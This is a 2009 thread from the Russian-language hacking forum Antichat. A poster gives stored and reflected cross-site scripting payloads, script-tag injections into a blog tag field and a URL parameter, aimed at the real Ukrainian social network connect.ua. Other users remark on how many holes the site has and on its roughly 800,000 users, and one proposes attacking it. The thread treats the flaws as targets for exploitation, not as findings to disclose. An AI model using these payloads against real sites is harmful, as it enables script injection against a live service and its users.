Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Социальные сети (https://forum.antichat.xyz/forumdisplay.php?f=133)

- - connect.ua (https://forum.antichat.xyz/showthread.php?t=141271)

_krad_

14.09.2009 00:02

connect.ua

Активная XSS:
Когда создаем новую запись в блоге, в поле "Мітки" вводим

"><script>alert(123)</script>

Аналогичная пассивная XSS:

http://connect.ua/blogs?index&tag="><script>alert(123)</script>

ligendo

14.09.2009 00:06

да там их туева хуча

ZnikiR

14.09.2009 00:27

ну и что вы сделатете с этими дырками???
вот такую бы на майл.ру или б на вк,тогда да!

ой извеняюсь,это что ли соц сеть в украине?

Я в шоке дырявый код ппц простоа говрят у них там очень много пользователей около 800 000 !!!
Давайте разденем сайт!!!

Enemy_best

14.09.2009 01:24

И чё этот скрипт делает?

Kusto

14.09.2009 01:39

не надо было отдельную тему создавать для активок и пассивок есть соответствующие темы, просто в очередной раз с"экономили на кодерах вот и все, а насчет активок зайди в раздел активные XSS там найдеш их кучу на известных сайтах, могу выложить и пассивок на том-же майле- не одну, так мне что отдельную тему создавать?

Время: 12:26